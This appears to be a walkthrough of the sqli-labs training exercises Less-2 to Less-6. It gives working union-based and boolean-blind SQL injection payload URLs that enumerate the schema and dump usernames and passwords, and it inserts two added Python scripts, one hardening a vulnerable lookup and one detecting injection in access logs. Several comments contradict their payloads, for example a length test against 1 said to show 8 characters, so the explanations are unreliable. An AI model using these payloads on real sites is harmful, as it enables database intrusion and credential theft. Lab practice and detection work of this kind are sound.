Preface
The approach for Less-2 through Less-4 of the SQL challenge is essentially the same as for Less-1, and Less-5 and Less-6 follow the same approach as Less-8, so here I only list the URLs I used; since the routine is identical I will not go over it again. If readers hit something they do not understand, they can refer to my earlier SQL challenge articles. I hope this gives readers a good reading experience.
1. SQL database structure
Before injecting into a SQL database you first need to understand its structure. What matters here is 1 database, 3 tables and 6 columns.
The 1 database is information_schema.
The 3 tables are schemata, tables and columns.
The 6 columns are: schema_name under schemata; table_name and table_schema under tables; table_name, table_schema and column_name under columns.
Once you are familiar with this 1 database, 3 tables and 6 columns, the payloads below become much easier to understand.
2. Less-2 payloads
http://192.168.182.30/sql/Less-2/?id=1'
http://192.168.182.30/sql/Less-2/?id=1 and 1=1
http://192.168.182.30/sql/Less-2/?id=1 and 1=2  (shows this is a numeric SQL injection)
http://192.168.182.30/sql/Less-2/?id=1 order by 3%23
http://192.168.182.30/sql/Less-2/?id=1 order by 4%23  (shows there are three columns)
http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,3
http://192.168.182.30/sql/Less-2/?id=-1 union select 1,database(),version()
http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'  (Less-2 does not need the trailing # comment)
http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from security.users
3. Less-3 payloads
http://192.168.182.30/sql/Less-3/?id=1')%23
http://192.168.182.30/sql/Less-3/?id=1') and 1=1%23
http://192.168.182.30/sql/Less-3/?id=1') and 1=2%23  (shows this is a string injection)
http://192.168.182.30/sql/Less-3/?id=1') order by 3%23
http://192.168.182.30/sql/Less-3/?id=1') order by 4%23  (shows there are 3 columns)
http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,3%23
http://192.168.182.30/sql/Less-3/?id=-1') union select 1,database(),version()%23
http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23
http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23
http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users%23
4. Less-4 payloads
http://192.168.182.30/sql/Less-4/?id=1")%23
http://192.168.182.30/sql/Less-4/?id=1") and 1=1%23
http://192.168.182.30/sql/Less-4/?id=1") and 1=2%23  (shows this is a string injection)
http://192.168.182.30/sql/Less-4/?id=1") order by 3%23
http://192.168.182.30/sql/Less-4/?id=1") order by 4%23
http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,3%23
http://192.168.182.30/sql/Less-4/?id=-1") union select 1,database(),version()%23
http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23
http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23
http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users%23
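Less-2, Less-3 and Less-4 differ only in how the parameter is wrapped in the query, which is why the same union routine works in all three once the wrapper is closed. The following Python/sqlite3 script is an added example written for this page; it is not code from the original post or from sqli-labs. It assumes the lab builds its query by string concatenation in the shapes id={v} (Less-2) and id=('{v}') (Less-3); Less-4 is the same with double quotes and is left out because SQLite treats double-quoted strings differently from MySQL. The users table is constructed, and SQLite needs "-- " as the comment terminator where the page uses %23. The hardened lookup validates the type and binds the value, so the same inputs stop being SQL.

```python
import sqlite3

# Constructed stand-in for the sqli-labs security.users table (not the lab's real data).
ROWS = [(1, "alice", "hash-a"), (2, "bob", "hash-b"), (3, "carol", "hash-c")]

# Assumed query shapes (mirroring Less-2 and Less-3): user input is spliced in as text.
TEMPLATES = {
    "less2_numeric": "SELECT id, username, password FROM users WHERE id={v} LIMIT 0,1",
    "less3_paren_single": "SELECT id, username, password FROM users WHERE id=('{v}') LIMIT 0,1",
}


def make_db():
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, context, user_input):
    """String-concatenated query: whatever the caller sends becomes part of the SQL.

    With id=-1 no real row matches, so the UNION's own row is what LIMIT 0,1 returns;
    in the Less-3 shape the payload closes the (' ') wrapper and comments out the rest.
    """
    sql = TEMPLATES[context].format(v=user_input)
    return conn.execute(sql).fetchone()


def hardened_lookup(conn, user_input):
    """Validate the type, then bind it: the value can never become SQL syntax."""
    try:
        id_value = int(user_input)
    except ValueError:
        return None  # "1 and 1=1", "-1 union ...", "-1') ..." all fail here
    return conn.execute(
        "SELECT id, username, password FROM users WHERE id=? LIMIT 1", (id_value,)
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    for ctx, payload in [
        ("less2_numeric", "1"),
        ("less2_numeric", "-1 union select 1,2,3"),
        ("less3_paren_single", "-1') union select 1,2,3 -- "),
    ]:
        print(ctx, repr(payload), "->", vulnerable_lookup(db, ctx, payload))
    print("hardened", "-1 union select 1,2,3", "->", hardened_lookup(db, "-1 union select 1,2,3"))
```

The order by 3 / order by 4 probes from the page work the same way: they only tell the attacker anything because the column count of the concatenated query is visible through the error, which binding the value also removes.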
5. Less-5 payloads
http://192.168.182.30/sql/Less-5/?id=1' and length(database())=1%23  (shows the database name has 8 characters)
http://192.168.182.30/sql/Less-5/?id=1' and substr(database(),1,1)='t'%23  (shows the first letter of the database name is s)
http://192.168.182.30/sql/Less-5/?id=1' and substr(database(),1,1)='t'%23  (a Burp Intruder cluster bomb run shows the database name is security)
http://192.168.182.30/sql/Less-5/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=5%23  (shows the database has 5 tables in total)
http://192.168.182.30/sql/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6%23  (shows the table name is 6 characters long)
http://192.168.182.30/sql/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1) ='r'%23  (shows the table name is emails)
http://192.168.182.30/sql/Less-5/?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = 'users')=3%23  (shows the users table has 3 columns)
http://192.168.182.30/sql/Less-5/?id=1' and substr((select username from users limit 0,1),1,1)='D'%23
http://192.168.182.30/sql/Less-5/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' limit 0,1),1,1)='e'%23  (shows the column name is id)
6. Less-6 payloads
http://192.168.182.30/sql/Less-6/?id=1"
http://192.168.182.30/sql/Less-6/?id=1" and 1=1%23
http://192.168.182.30/sql/Less-6/?id=1" and 1=2%23  (shows this is a string injection)
http://192.168.182.30/sql/Less-6/?id=1" and length(database())=1%23  (shows the database name is 8 characters long)
http://192.168.182.30/sql/Less-6/?id=1" and substr(database(),1,1)='s'%23  (shows the first letter of the database name is s)
http://192.168.182.30/sql/Less-6/?id=1" and substr(database(),1,1)='s'%23  (shows the database name is security)
http://192.168.182.30/sql/Less-6/?id=1" and (select count(table_name) from information_schema.tables where table_schema=database())=5%23  (shows there are 5 tables in total)
http://192.168.182.30/sql/Less-6/?id=1" and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1%23  (the table name is 6 characters long)
http://192.168.182.30/sql/Less-6/?id=1" and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e'%23
http://192.168.182.30/sql/Less-6/?id=1" and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='emails')=4%23  (shows the emails table has 2 columns)
http://192.168.182.30/sql/Less-6/?id=1" and length((select column_name from information_schema.columns where table_schema=database() limit 0, 1))=4%23  (shows the column name is 2 characters long)
http://192.168.182.30/sql/Less-6/?id=1" and substr((select column_name from information_schema.columns where table_schema=database() limit 0, 1),1,1)='e'%23  (shows the column is id)
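The boolean-blind routine in Less-5 and Less-6 has a cost the attacker cannot hide: every character of every name is guessed with its own request, so a web server log fills with near-identical requests carrying length(), substr(), count() and information_schema. The script below is an added detection example written for this page, not code from the post or from sqli-labs. It assumes Apache combined-format access log lines (the lines embedded here are constructed from the page's own payloads, URL-encoded as a browser or Burp would send them), URL-decodes the request path, matches a small set of pattern rules, and aggregates hits per client address; the alert threshold of 3 flagged requests is an assumed tuning value.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-style access log lines (not real traffic).
LOG_LINES = [
    '192.168.182.1 - - [01/Jan/2024:10:00:00 +0800] "GET /sql/Less-5/?id=1 HTTP/1.1" 200 1234',
    '192.168.182.1 - - [01/Jan/2024:10:00:01 +0800] "GET /sql/Less-5/?id=1%27%20and%20length(database())=8%23 HTTP/1.1" 200 1234',
    '192.168.182.1 - - [01/Jan/2024:10:00:02 +0800] "GET /sql/Less-5/?id=1%27%20and%20substr(database(),1,1)=%27s%27%23 HTTP/1.1" 200 1234',
    '192.168.182.1 - - [01/Jan/2024:10:00:03 +0800] "GET /sql/Less-6/?id=1%22%20and%20(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database())=5%23 HTTP/1.1" 200 1234',
    '192.168.182.1 - - [01/Jan/2024:10:00:04 +0800] "GET /sql/Less-2/?id=-1%20union%20select%201,database(),version() HTTP/1.1" 200 980',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0800] "GET /sql/Less-2/?id=2 HTTP/1.1" 200 1234',
    '10.0.0.7 - - [01/Jan/2024:10:00:06 +0800] "GET /index.php?q=order%20status HTTP/1.1" 200 512',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Pattern rules covering the techniques the page walks through.
RULES = {
    "union_select": re.compile(r"\bunion\b[\s\S]*?\bselect\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "blind_function": re.compile(
        r"\b(substr|substring|mid|length|ascii|database|version|sleep|benchmark)\s*\(", re.I
    ),
    "tautology": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
}


def parse_line(line):
    """Return the named fields of one access log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_path(path, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are also inspected."""
    for _ in range(rounds):
        decoded = unquote_plus(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(decoded_path):
    """Names of the rules that match a decoded request path, sorted for stable output."""
    return sorted(name for name, rx in RULES.items() if rx.search(decoded_path))


def scan(lines, threshold=3):
    """Aggregate flagged requests per client; alert on clients at or above the threshold."""
    per_ip = defaultdict(lambda: {"requests": 0, "flagged": 0, "rules": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skipped, but a real deployment should count these
        entry = per_ip[rec["ip"]]
        entry["requests"] += 1
        hits = classify(decode_path(rec["path"]))
        if hits:
            entry["flagged"] += 1
            entry["rules"].update(hits)
    alerts = {ip: e for ip, e in per_ip.items() if e["flagged"] >= threshold}
    return per_ip, alerts


if __name__ == "__main__":
    stats, alerts = scan(LOG_LINES)
    for ip, e in alerts.items():
        print(f"ALERT {ip}: {e['flagged']}/{e['requests']} requests matched {sorted(e['rules'])}")
```

The per-client aggregate is the useful signal here: a single substr() in a query string is easy to dismiss, but dozens of them from one address within seconds, all against the same parameter, is exactly the shape of the Burp Intruder run the post relies on.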
Summary
The payloads in the URLs above retrieve only a small part of what we might want. To get the contents of other tables and columns, we only need to change the corresponding parameters. For Less-5 and Less-6, of course, we need Burp Suite to help capture the requests and brute-force the values. If anything is unclear, readers can refer to my earlier articles on Less-1 and Less-8 of the SQL challenge and study them together; that works much better.